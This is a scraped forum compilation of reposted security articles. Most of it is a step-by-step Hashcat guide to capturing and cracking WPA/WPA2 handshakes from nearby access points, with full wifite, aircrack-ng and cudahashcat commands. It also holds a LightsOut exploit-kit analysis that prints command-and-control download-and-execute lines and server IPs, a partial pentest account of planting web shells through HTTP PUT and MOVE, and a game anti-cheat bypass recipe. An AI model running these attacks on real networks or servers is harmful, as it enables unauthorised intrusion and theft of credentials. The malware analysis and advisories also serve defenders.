obvious reasons). dude got some massive screen!!! 1920×1080 16:9 HD 1080p!!! [TABLE] [TR] [TD]zimmaro_the_g0at <email truncated> <ip address truncared>[/TD] [TD] Submitted on 2014/03/30 at 2:43 am all always(our-friend): excellent explanation and thank you for sharing your knowledge / experiences PS:if I may some “” basic-hash “” can be generated directly with our KALI ImagesTime.com-hash.PNG [/TD] [/TR] [/TABLE] Conclusion This guide is here to show you how you can crack passwords using simple attack mode.You might ask why I showed the same command over and over again! Well, by the end of this guide, you will never forget the basics. There’s of course advanced usage, but you need to have a strong basics. I would suggest to read Wiki and Manuals from www.hashcat.net to get a better understanding of rule based attacks because that’s the biggest strength of Hashcat. The guys in Hashcat forums are very knowledgeable and know what they are doing. If you need to know anything, you MUST read manuals before you go and ask something. Usually RTFM is the first response … so yeah, tread lightly. Thanks for reading. Feel free to share this article. Sursa: Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux | blackMORE Ops

Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) This entry was posted in Cracking How to Kali Linux Linux and tagged Cracking Hashcat How to Wifi on March 27, 2014 by blackMORE Ops. Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake .cap files. Only constraint is, you need to convert a .cap file to a .hccap file format. This is rather easy. Contents Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) My Setup NVIDIA Users: AMD Users: [*]Why use Hashcat to crack WPA/WPA2 handshake file? Built-in charsets Numbered passwords Letter passwords – All uppercase Letter passwords – All lowercase Passwords – Lowercase letters and numbers Passwords – Uppercase letters and numbers Passwords – Mixed matched with uppercase, lowercase, number and special characters. Passwords – when you know a few characters [*]Capture handshake with WiFite [*]Cleanup your cap file using wpaclean [*]Convert .cap file to .hccap format [*]Cracking WPA/WPA2 handshake with Hashcat [*]Dictionary attack [*]Brute-Force Attack Sample: Sample .hcmask file [*]Location of Cracked passwords [*]Conclusion [*]Google+ My Setup I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux. I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect. To enable GPU Cracking, you need to install either CUDA for NVIDIA or AMDAPPSDK for AMD graphics cards. I’ve covered those in in my previous posts. NVIDIA Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 Install AMD APP SDK in Kali Linux Install Pyrit in Kali Linux Install CAL++ in Kali Linux Why use Hashcat to crack WPA/WPA2 handshake file? Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files? Because we can? Because Hashcat allows us to use customized attacks with predefined rules and Masks. Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up. Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file. Built-in charsets ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = !”#$%&'()*+,-./:;??@[\]^_`{|}~ ?a = ?l?u?d?s Numbered passwords So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea. Letter passwords – All uppercase If your password is all letters in CAPS such as: ABCFEFGH or LKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK: ?u?u?u?u?u?u?u?u It will crack all 8 Letter passwords in CAPS. Letter passwords – All lowercase If your password is all letters in lowercase such as: abcdefgh or dfghpoiu or bnmiopty..etc. then you can use the following MASK: ?l?l?l?l?l?l?l?l It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at. Passwords – Lowercase letters and numbers If you know your password is similar to this: a1b2c3d4 or p9o8i7u6 or n4j2k5l6 …etc. then you can use the following MASK: ?l?d?l?d?l?d?l?d Passwords – Uppercase letters and numbers If you know your password is similar to this: A1B2C3D4 or P9O8I7U6 or N4J2K5L6 …etc. then you can use the following MASK: ?u?d?u?d?u?d?u?d Passwords – Mixed matched with uppercase, lowercase, number and special characters. If you password is all random, then you can just use a MASK like the following: ?a?a?a?a?a?a?a?a Note: ?a represents anything …. I hope you’re getting the idea. If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario. Passwords – when you know a few characters If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following: abc?l?l?l?l?l abc?u?u?u?u?u abc?d?d?d?d?d abc?l?u??d??d?l abc?d?d?l?u?l There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords. You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers. Example: Abcde123 Your mask will be: ?u?l?l?l?l?d?d?d This will make cracking significantly faster. Social engineering is the key here. That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files. Following WiFite section was taken from a previous guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux which was one of the best guides about cracking Wifi passwords out there. Capture handshake with WiFite Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands.. Type in the following command in your Kali Linux terminal: wifite –wpa You could also type in wifite wpa2 If you want to see everything, (wep, wpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes wifite Once you type in following is what you’ll see. So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all. So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic. Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it. This is actually a great feature of WIfite. It now asks me, What do you want to do? [c]ontinue attacking targets [e]xit completely. I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time. And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake. This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file. Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back. Now that we have a capture file with handshake on it, we can do a few things. Cleanup your cap file using wpaclean Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here’s how to do it: To convert your .cap files manually in Kali Linux, use the following command wpaclean <out.cap> <in.cap> Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion. In my case, the command is as follows: wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap Convert .cap file to .hccap format We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand. To convert it to .hccap format with “aircrack-ng” we need to use the -J option aircrack-ng <out.cap> -J <out.hccap> Note the -J is a capitol J not lower case j. In my case, the command is as follows: aircrack-ng hs/out.cap -J hs/out Cracking WPA/WPA2 handshake with Hashcat cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios: Dictionary attack Mask attack Dictionary attack Grab some Wordlists, like Rockyou. Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc. First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux guide. Here’s a short rundown: cudahashcat --help | grep WPA So it’s 2500. Now use the following command to start the cracking process: cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while. You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length. Brute-Force Attack Now this is the main part of this guide. Using Brute Force MASK attack. To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command: Sample: cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d Where -m = 2500 means we are attacking a WPA/WPA2 handshake file. -a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack). capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng. ?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678 etc. I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask. /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat: ls /usr/share/oclhashcat/masks/ In my case, the command is as follows: cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/blackmoreops-1.hcmask Sample .hcmask file You can check the content of a sample .hcmask file using the following command: tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip. Location of Cracked passwords Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory. cat hashcat.pot Conclusion This guide explains a lot. But you should read read Wiki and Manuals from www.hashcat.net to get a better understanding of MASK and Rule based attacks because that’s the biggest strength of Hashcat. Thanks for reading. Feel free to share this article. Sursa: Cracking WPA WPA2 with Hashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords) | blackMORE Ops

[h=2][/h] Continued analysis of the LightsOut Exploit Kit At the end of March, we disclosed the coverage of an Exploit Kit we called “Hello”: VRT: Hello, a new specifically covered exploit kit, or “LightsOut”, we thought we’d do a follow up post to tear this exploit kit apart a bit more. This variant of the LightsOut exploit kit uses a number of Java vulnerabilities, and targets multiple browsers. The primary goal is to drop & execute a downloader executable, which in turn downloads and executes more malware samples. These secondary malware samples are run in a sequence, and do some information harvesting, and potentially exfiltrate the information harvested. Overall, not fun for visitors to sites compromised with the LightsOut exploit kit. Because of the number of Java vulnerabilities leveraged by this kit; it's important to keep Java updated, and make certain that outdated versions of Java aren't still sticking around on your PC. You can download a utility from Oracle to remove outdated versions of Java, referenced by this article: https://www.java.com/en/download/faq/uninstaller_toolinfo.xml. A detailed analysis on how the kit operates is below, under Browser Trajectory Analysis. Java CVEs: CVE-2013-2465 - Incorrect image channel verification (buffered image) CVE-2012-1723 - Classloader vulnerablity CVE-2013-2423 - Java Security Prompt / Warning bypass Microsoft Internet Explorer CVEs: CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability CVE-XXXX-XXXX - Pending verification of another heap spray leveraging a use-after-free Browsers explicitly targeted: Chrome, Internet Explorer Snort SIDs that should catch parts of this kit: SIDs: 26569 through 26572, 26603 and 26668 First stage dropper: VT: https://www.virustotal.com/en/file/164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118 IP Address hosting malware: 93.188.161.235 Secondary dropped malware sample sha256 hashes: 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg JavaScript IDS evasion methods: Sample encoded string (remove all digits) from JavaScript "836f4974362o65679305r82637150N61617044a77736359m99323481e9388" becomes "forName" [h=2]Browser Trajectory Analysis[/h] [h=3]Stage 1: dtsrc.php - detect installed fonts, direct to 1st stage of exploits via IFRAME[/h] The first stage leverages a holdover technique from the Internet Explorer 6 era – the HtmlDlgSafeHelper ActiveX control; to check if a list of over 700 fonts are available to the browser. This is entirely unrelated to any compromise method, but may be a method of "fingerprinting" the installed version and language packs of Windows + Internet Explorer, based on available fonts. The list of found fonts is concatenated together, MD5 hashed, and the hash is submitted to the malicious site. [h=3]Stage 2: dtsrc.php?a=h1 - plugin detection javascript, direction to individual exploits based on browser + plugins[/h] dtsrc.php?a=h1 has JavaScript that detects the environment in the browser to determine which exploits to direct the browser to. The JavaScript is obfuscated and minified (placed all on one line -- use a beautifier utility, or something like http://jsbeautifier.org for an online version) In-lines PluginDetect JS library from PluginDetect Interesting: has unused/commented-out code for detecting Microsoft SharePoint plugins. All of the exploits are called by dynamically appending an <IFRAME> tag to the document, pointing to one of the exploit URLs. This is the common IFRAME function leveraged by the dtsrc,php?a=h1 page. Here’s the unused detection routine for SharePoint — this may be an incomplete attempt to exploit the MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free vulnerability. [h=3]Browser compromise flow:[/h] [h=4]IE 7 on XP ––> h5 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 8 on XP ––> h6 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]IE 6 on XP ––> h4 exploit page, then:[/h] Java 6 update <= 32 = h7 exploit page OR Java 7 update <= 17 = h2 exploit page [h=4]Chrome on Windows ––> Java 7 update <= 7 = h3 exploit page[/h] [h=4]Any browser ––> Java 6 update <= 32 = h7 exploit page (see above screenshot)[/h] OR Java 7 update <= 17 = h2 exploit page [h=3]Stage 3: dtsrc.php?a={??} where {??} is one of the h2/h3 etc below[/h] [h=4]h2 == Java 7 update <= 17 CVE-2013-2423[/h] This uses a base64 encoded JNLP with applet parameter __applet_ssv_validated=true for the CVE-2013-2423 warning bypass Loads the r2 JAR for downloading the dropper And if we base64 decode the jnlp_embedded parameter, here’s the warning dialog bypas: [h=4]h3 == Chrome w/ Java 7 update <= 17 CVE-2013-2423[/h] Nearly exactly the same as h2 page, the JNLP is encoded/presented differently. Uses deployJava.js from java.com; deployJava.runApplet( Loads the r2 JAR for downloading the dropper And it’s the exact same base64 encoded JNLP from H2. [h=4]h4 & h5 == Microsoft Internet Explorer 6 and Windows XP[/h] Heap Spray w/ DOM use-after-free vulnerability - we have ongoing research to determine exactly which CVE it is. [h=4]h6 == Microsoft Internet Explorer 8 and Windows XP[/h] CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability Snort SIDs: 26569 through 26572, 26603 and 26668 The code on the page is pretty much a direct rip-off of the metsploit ie_cgenericelement_uaf.rb module https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb [h=4]h7 == Java 6 update <= 32[/h] Direct <applet> loading of r7 JAR, which leverages the CVE-2012-1723 classloader confusion vulnerability [h=3] Java JAR Analysis[/h] [h=4]r2 jar - CVE-2013-2465[/h] CVE-2013-2465 is the Incorrect image channel verification (buffered image) vulnerability, which permits execution of arbitrary code. Java class grants itself full permissions via overloading java.security.AllPermission Ultimately downloads to disk and executes an executable (ntsys391.exe). This JAR has a pretty simple IDS evasion technique where it decodes the URL to download the executable at runtime, through simple XOR routine. [h=4]r7 jar - CVE-2012-1723[/h] This exploits the getClassLoader vulnerability - by modifying a class file by hand, you can confuse the Java runtime between a static variable and an instance variable. This results in code being executed outside of the java sandbox, when it hasn't been verified as safe. A Java class grants itself full permissions via overloading java.security.AllPermission One of the malicious classes in the JAR has another class embedded as a string that gets decoded and executed directly (r7-embedded.class, below) [h=4]r7-embedded.class[/h] This leverages java.security.PrivilegedExceptionAction When successful, it downloads an executable from a hardcoded url to the Java temp dir, and saves the file as ntsys391.exe. The hard-coded URL is the same .php file as the rest of the exploit kit including the fully qualified domain name. This may mean the exploit kit is rebuilt for each compromised host, or the r7 jar is dynamically built for each request by PHP. [h=3]Stage 4 - the dropped executable - which is a dropper as well[/h] Either one of the Java vulnerabilities or the heap spray in Microsoft Internet Explorer requests dtsrc.php?a=dwe, which is saved to disk as ntsys391.exe ntsys391.exe downloads additional executables, the .jpg URLs referenced below under “Network Indicators” [h=3]Host Indicators[/h] First stage dropper: - initially dropped as ntsys391.exe SHA: D667833E4915C385321B553785732BBED3009C2A SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da [*]Copies/Renames self as C:\Documents and Settings\Administrator\Application Data\ Broker services\WbemMonitor .exe [*]Runs self: "WbemMonitor .exe -fst” [*]Phones home to C2 w/ a POST request (see “Network Indicators” below) to retrieve other executables to download. [*]Retrieves shot.jpg, which is actually an EXE -> C:\Documents and Settings\Administrator\Application Data\ Broker services\plugs\mmc.exe SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e [h=3]Network Indicators[/h] Contacts 93.171.216.118 Request: (Analyst Note: notice — no User-Agent header, HTTP/1.1 to a dotted quad) POST /check_value.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 93.171.216.118 Content-Length: 42 Connection: Keep-Alive Cache-Control: no-cache [*]Post Body: identifiant=51032_2161380123730&version=2. Response: (Analyst Note: broken apart for readability - this was originally all on one line - lines delimited by a ; character, and trivally defanged) work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg; work:5|downexec hxxp://93.188.161[.]235/check2/muees27jxt/tl.jpg; work:7|downexec hxxp://93.188.161[.]235/check2/muees27jxt/fl.jpg; work:290|downexec hxxp://93.188.161[.]235/check2/muees27jxt/inf.jpg; 93.188.161.235 Request (Analyst Note: this kit only returns the JPG if the user-agent matches the string below, HTTP/1.1 to a dotted quad) GET /check2/muees27jxt/shot.jpg HTTP/1.1 User-Agent: User-Agent: Opera/10.35 Presto/2.2.30 Host: 93.188.161.235 Cache-Control: no-cache [*]Response: PE executable Written by Richard Harman at 1:24 PM Sursa: VRT: Continued analysis of the LightsOut Exploit Kit

[h=2]OpenSSH not anymore depending on OpenSSL[/h]May 3rd, 2014 Mourad Ben Lakhoua OpenSSH is an important set of programs that is used to encrypt communication and connect to servers over SSH. This is the standard way used by many system administrators to remotely manage thousands of servers. For long time developers have planned to remove the OpenSSL package as this is not required for the communication and protocol functionality but they use the crypto of OpenSSL. Now and starting with the next version of OpenSSH it is possible to have the package compiled with the key make OPENSSL = no, to remove the OpenSSL dependencies. According to the release notes with this setting administrator reduce certain set of cryptographic standards from the old protocol SSH- 1 (that include algorithms to curve25519, aes-ctr, chacha, ed25519). The protocol that should be used is SSH- 2 that comes to add more security and is more reliable while I think that the first version is not anymore used. By this new release it will be important to directly exclude OpenSSL and any other package that is not used to reduce the vulnerability surface in your infrastructure. OpenBSD and OpenSSH developers have recently launched a project called LibreSSL that comes to clean OpenSSL code from glitches and security troubles especially after the critical Heartbleed vulnerability which left 2/3 websites in the cyberspace vulnerable for more than 2 years. Sursa: OpenSSH not anymore depending on OpenSSL | SecTechno

The main purpose of this section is to provide programs skeletons for research and beta or partial toolz. Rarely updated and not intended for real usage or for the common users... aluigifuzz 0.3 (aluigifuzz) this is the dumb file mutation fuzzer I wrote in 2011 for my personal usage and was incredibly useful at that time. I have decided to release it because I no longer use it, read aluigifuzz.txt for additional information and examples. Offbreak (offbreak) useful tool to track the operations performed by a program on a file at a given offset (hosted on ReVuln). UDPSZ 0.3.4 (udpsz) tool for sending UDP, TCP or any other type of packet with custom size, content, source port and IP address (spoofing, where possible). its options are very useful for more specific tests but not much easy to use (chaotics), that's why the -d option is suggested to check if the output packets have really the desired format. note that this tool has been written for myself so it acts mainly as a generic proof-of-concept for everything I want to test and prove. One file only web/ftp server 0.6.1 (onlywebs) multi-thread web and FTP server written to provide ever the same file without writing/listing/indexing features of such protocols, but now it's able to do many interesting things useful for my tests. it has various crazy options for testing purposes, so do NOT use it except if I specify it in my advisories. partially compatible with the following protocols: HTTP, FTP, WebDav, RTSP. mygrep 0.1 (mygrep) useful tool for scanning files and folders searching strings (C syntax supported) as binary patterns, utf16 unicode, base64, hex and other methods. example: mygrep "\x08\x00\x00\x00mystring" file.txt folder\folder c:\path1 Generic FTP PASV ports consumption 0.1 (ftpports) simple tool for sending endless PASV commands to FTP servers, it has been created as PoC for a bug in Serv-U FTP 11.1.0.3. UDD files quick informations 0.1 (uddinfo) quick and basic tool which show some information contained in the UDD files used in Ollydbg like the various breakpoints and the comments. Webservers char tester 0.1.1 (webtestchr) a simple tool which has been very useful in all this time for the blind and quick testing of some vulnerabilities in software that uses the HTTP protocol. practically it scans all the 255 ascii chars and put them in some particular locations of the URI like before and after the slash or at the end of the URI and so on. usually the types of vulnerabilities which can be tested through this method are source disclosure (like for php and cgi files), security bypass (like folders or files which require specific rights or password), possible exceptions and others all dependent by the program to test. one of the recent advisories in which this tool was helpful was the source disclosure in Ruby WEBrick. FindBits 0.2.2a (findbits) simple and useful tool for analyzing a given file to search if exist text strings or bytes which are packed in bitstreams. the tool can be even used to read and visualize a custom amount of bits, for example using the option -s "1 4 32 1000" the tool will visualize the hexadecimal, string, decimal and binary values of the first 1, 4 and 32 bits of the file and the hex dump of the subsequent 1000 bits. some examples of game protocols which use the bitstreams are the Unreal engine and the Battlefield series. loDNS 0.1.1 (lodns) simple tool I wrote for my tests which emulates a basic DNS server and logs all the hostnames in the received requests and then replies with a fixed IP address (A type). it uses 127.0.0.1 as default IP address in which resolving the hostnames but it can be changed at command-line, if it's used the IP 0.0.0.0 the tool will not reply (monitoring only) while if you use 255.255.255.255 it will act like a proxy. it's a good way for resolving unknown hostnames locally while testing a program, it's only needed to set 127.0.0.1 as primary DNS and launching loDNS. TFTP server tester 0.2a (tftpx) nice tool that acts like TFTP client with some advanced feature. Generic custom HTTP file uploader 0.2a (myhttpup) simple tool for uploading files (POST + mime) choosing the name of the destination file, useful for testing directory traversal vulnerabilities in web servers and components which allow to upload files. Unreal engine test server 0.1 (unrealts) basic way for emulating an Unreal server and testing the sending of commands to a connected client Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine: sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234 (use -L "" for the runtime help) then from the console of the game type: connect 127.0.0.1:1234 the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes): sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234 then from the client: pb_cl_disable connect 127.0.0.1:1234 Dumproc 0.1.1 (dumproc) simple process dumper for both Windows and Linux. Live for Speed demo/S1/S2 packets modifier example 0.1 (lfsanus) useless and basic proxy tool for modifying the packets of this game, old stuff written just for fun. Tcpdump format UDP 2 TCP converter 0.1.1 (pcapu2t) simple tool written for converting the UDP packets of a PCAP file in a TCP stream, useful for tracking the packets flow with Wireshark. no longer needed because Wireshark implemented the following of the UDP packets various versions ago. WAVEhead 0.1 (wavehead) experimental and useless tool for adding a wave header to raw files or for modifying existent wave headers (mainly for uncompressed files) or extracting the raw audio from wave files. JavaScript slide show skeleton 0.1 a simple JavaScript example for animating many sequential image files. Webpostmem 0.1 (webpostmem) This tool can be used to check the POST attacks on webservers as for example memory and sockets that are not freed if the client sends less data than how much specified in Content-Lenght. It is the same proof-of-concept I have used for the bugs in Goahead webserver, NULLhttpd and WWW Fileshare Pro. Q3huffdecenc 0.2 (q3huffdecenc) compress and uncompress the files containing the "connect" packets of the games that use the Quake 3 engine. Q3sendenc 0.2.1 (q3sendenc) this tool gets a custom file specified by the user, compress it using the Huffman compression, sends it to a server based on the Quake 3 engine and then waits for a reply. It also calculates the challenge, the protocol and the punkbuster parameters just to make a successful login with the server. it could be useful for who wants to test the Quake 3 engine and its possible flaws. Custom GIF creator 0.1 (gifbug) a very simple tool to create GIF files with customized headers. HLspfed 0.1.1a (hlspfed) Half-Life single-proxy forwarder with encoding/decoding functions. This tool is a packets forwarder (datapipe) for Half-Life that lets you to modify, manipulate and insert any type of data you want in the packets exchanged between the Half-Life server and the client. ut2003fits 0.1 (ut2003fits) UT2003 fake information test server: this tool can be used to send custom information to the clients that search for multiplayer games (very funny if used when the real UT2003 server is running). this simple tool can be used in a lot of modes. For example you can launch UT2003heartbeat and then launching UT2003fits you will see all the players that are online because every player that goes in the multiplayer section of UT2003 will automatically request information to all the servers available and you can log all these players (for example for statistical purposes). Half-Life testing server 0.1.2 (hlts) this server answers to the Half-Life queries. It supports: ping, infostring, details, getchallenge, players, rules, challenge rcon and connect. UT2003 heartbeat emulator 0.1 (ut2003heartbeat) heartbeat protocol emulator for UT2003. With this little code you can add your IP address to the official Epic UT2003 servers list (epicgames.com and demo-all.txt). HERE there is the explanation of the protocol. Quake 3 testing server 0.3 (q3ts) this server answers to the Quake 3 queries. It supports: getstatus, getinfo, getchallenge, connect (with real-time decompression), rcon and disconnect. It supports the infoResponse of Quake 3 arena 1.32, Soldier of Fortune 2 1.03 GOLD, Return to Castle Wolfenstein 1.41, Medal of Honor: Allied Assault 1.11. Browser's headers viewer simple unfiltered php script to see all the headers sent by your browser (useful to check the anonimity of a proxy for example) Sursa: Luigi Auriemma

blueflower blueflower is a simple tool that looks for secrets such as private keys or passwords in a file structure. Interesting files are detected using heuristics on their names and on their content. Unlike some forensics tools, blueflower does not search in RAM, and does not attempt to identify cryptographic keys or algorithms in binaries. DISCLAIMER: This program is under development. It may not work as expected and it may destroy your computer. Use at your own risk. Features multithreading detection of various key and password containers (SSH, Apple keychain, Java KeyStore, etc.) and other interesting files (Bitcoin wallets, PGP policies, etc.) detection of encrypted containers (Truecrypt, PGP Disks, GnuPG files, etc.) search in the content of the following types of files: text/* MIME-typed files archives RAR, tar, ZIP compressed files bzip2, gzip encrypted containers/archives: PGP/GPG, Truecrypt, RAR, ZIP PDF documents [*]support of nested archives and compressed files (except for nested RARs) [*]portable *nix/Windows [*]CSV output Sursa: https://github.com/veorq/blueflower

ICEcoder ICEcoder is an open-source code editor, which provides a modern approach to building websites. By allowing you to code directly within the web browser, online or offline, it means you only need one program (your browser) to develop sites, plus can test on actual web servers. After development, you can also maintain the website easily, all of which make for speedy and smart development. Because it can be web based you can use it from any internet enabled computer with a modern browser and because it's open-source, customise it to your liking, integrating with online services. If you'd like to use it as a desktop code editor, no problems, you only need PHP 5.0+ (though 5.3+ is recommeded), so you can use on Linux and on PC via MAMP or XAMPP and Mac via WAMP (or another PHP installation). ICEcoder was created because web devs (like myself) always complained their code editor didn't do exactly what they like. They're often bloated with features, slow and awkward. Conversely, ICEcoder is lightweight (zip is around 0.4mb) and boots in seconds (often 1-2s). Oh, and it's also free. Enjoy! Code editor features While it looks simplistic on the surface, ICEcoder packs a whole load of features and plugins to make coding slick & efficient. Some of the best include: use online or locally Use it online from wherever you are, but it also runs under localhost too as a desktop solution. broken tag indicators An indicator shows if you have a broken tag structures and highlights where errors occured. themes 16 highlighting themes come as standard but you can easily make your own with a CSS file. find & replace builder Find and replace can be applied to the current or all open documents, plus filenames & files. secure login ICEcoder can be setup wherever you wish and is login secured to help keep your files safe. It's multi user too! type boosters Plenty of coding assist is available such as Emmet, close tag completion and tag wrappers. nest display & selection A nesting display shows your cursor position, hover over them to highlight, click to select. linting with JS Hint as you type Your JavaScript code is linted with JS Hint as you type to ensure good coding practises. manage your MySQL databases MySQL database management is easy with the Adminer plugin. It's like phpMyAdmin, but better. Sursa: https://icecoder.net/

Owning The Enterprise With HTTP PUT During a routine penetration testing engagement, we found an IIS webserver with HTTP methods (verbs) like PUT and DELETE enabled on it. During enumeration of the web server we figured it was configured to run PHP as well. The PUT method allows an attacker to place a file on the server. Uploading a web shell was our obvious choice. However due to some security settings enabled on the server we were unable to upload any php/aspx/jsp etc. files. Had we been able to upload a shell, we would’ve gotten code execution on the server. But it was not as simple as we thought it to be. After trying some variation of the file types, we figured out we could upload .txt files on the server. We could access these files by opening them through the browser. After multiple attempts we decided to use something very simple: “MOVE”method to rename the files once they were uploaded on the server. So we uploaded a .php file as .txt and renamed that to .php The screenshot for these two steps is shown below: Here is the output when visiting our test123.php file, Safemode was enabled on the server and we didn’t really try to bypass that. But we uploaded an ASPX Shell on the server (rename the .txt file to .aspx as mentioned earlier). At this point our service was running with “Network Service”Privileges and we were limited in terms of our control on the Server. Using our ASPX webshell we were at least able to traverse the content on the server. We were able to read the MySQL configuration details for one of the applications configured on the server and noted that the database is configured using root. Armed with the credentials of the MySQL root user, we could login to the server remotely. Unlike Microsoft SQL Server there is no built-in stored procedure like xp_cmdshell that allows us to execute OS commands. However, MySQL has User Defined Functions (UDF) that can be used to execute OS level commands but they are not available by default. At this point 